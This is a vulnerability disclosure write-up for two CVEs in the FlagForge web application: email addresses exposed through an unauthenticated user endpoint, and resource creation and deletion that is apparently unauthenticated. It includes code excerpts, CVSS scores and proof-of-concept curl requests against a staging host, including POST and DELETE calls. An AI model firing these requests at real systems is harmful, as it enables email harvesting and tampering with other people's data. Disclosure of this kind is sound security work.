# [CVE-2025-59843](https://github.com/FlagForgeCTF/flagForge/security/advisories/GHSA-qqjv-8r5p-7xpj) & [CVE-2025-59932](https://github.com/FlagForgeCTF/flagForge/security/advisories/GHSA-v8rh-25rf-gfqw)

## 1. Public Exposure of User Email Addresses [CVE-2025-59843](https://github.com/FlagForgeCTF/flagForge/security/advisories/GHSA-qqjv-8r5p-7xpj)

In Scope / Affected Application: FlagForge Web Application

API Endpoint: `/api/user/[username]`

Details: The endpoint returns user email addresses without authentication. Any username can be queried publicly.

### Root Cause / Code Reference:

```js
const user = await UserSchema.findOne({
  name: { $regex: new RegExp(`^${username}$`, 'i') }
}).select('name email image totalScore customBadges createdAt role');

// No authentication check is performed
email: user.email, // Exposed publicly
```

### Severity (CVSS v4.0): 5.5 (Medium)

`CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:L/SI:N/SA:N/E:P/CR:M/IR:L/AR:L/MAV:N/MAC:L/MAT:N/MPR:N/MUI:N/MVC:L/MVI:N/MVA:N/MSC:L/MSI:N/MSA:N/AU:Y/RE:L`

### Impact: Attackers can enumerate users and access email addresses, leading to potential privacy violations.

### Proof of Concept (PoC):

```bash
curl "https://staging.flagforge.xyz/api/user/No%20Reply"
Sample Response:

{
  "success": true,
  "user": {
    "name": "No Reply",
    "email": "<REDACTED>",
    ...
  }
}
```
## 2. Potential Unauthenticated Resource Modification/Deletion [CVE-2025-59932](https://github.com/FlagForgeCTF/flagForge/security/advisories/GHSA-v8rh-25rf-gfqw)

In Scope / Affected Application: FlagForge Web Application

API Endpoint: `/api/resources`

Details:

GET `/api/resources` exposes all resources publicly.

Based on code review, `POST` and `DELETE` requests are not enforce authentication or authorization. These requests were not tested on the live system to avoid impacting production data.

Observed Headers (OPTIONS request):

```bash
❯ curl -i -X OPTIONS "https://staging.flagforge.xyz/api/resources"
HTTP/2 204
access-control-allow-origin: https://staging.flagforge.xyz
allow: DELETE, GET, HEAD, OPTIONS, POST
cache-control: no-store, no-cache, must-revalidate, proxy-revalidate
date: Thu, 25 Sep 2025 15:03:45 GMT
permissions-policy: geolocation=(), microphone=(), camera=(), payment=()
pragma: no-cache
referrer-policy: no-referrer
server: Vercel
strict-transport-security: max-age=31536000; includeSubDomains; preload
vary: rsc, next-router-state-tree, next-router-prefetch, next-router-segment-prefetch
x-content-type-options: nosniff
x-frame-options: DENY
x-matched-path: /api/resources
x-vercel-cache: MISS
x-vercel-id: bom1::iad1::v7k72-1758812623945-4e3fad4b58b4
x-xss-protection: 1; mode=block
```

### Severity (CVSS v4.0, if POST/DELETE are unauthenticated): 7.8 (High)

`CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:H/VA:L/SC:L/SI:H/SA:L/E:U/CR:M/IR:H/AR:M/MAV:N/MAC:L/MAT:N/MPR:N/MUI:N/MVC:L/MVI:H/MVA:L/MSC:L/MSI:H/MSA:L/S:N/AU:Y/RE:M/U:Red`

### Impact: If POST or DELETE are unauthenticated, an attacker could potentially create or delete resources, impacting platform integrity.

### Proof of Concept (PoC):

```bash
curl -X GET "https://staging.flagforge.xyz/api/resources"
```
This will give you the `_id` of the resources.

```bash
curl -X POST "https://staging.flagforge.xyz/api/resources" \
-H "Content-Type: application/json" \
-d '{"title":"Test","description":"Test","category":"Web","resourceLink":"https://example.com","uploadedBy":"tester"}'
```

```bash
curl -X DELETE "https://staging.flagforge.xyz/api/resources?id=<resource-id>"
```

---
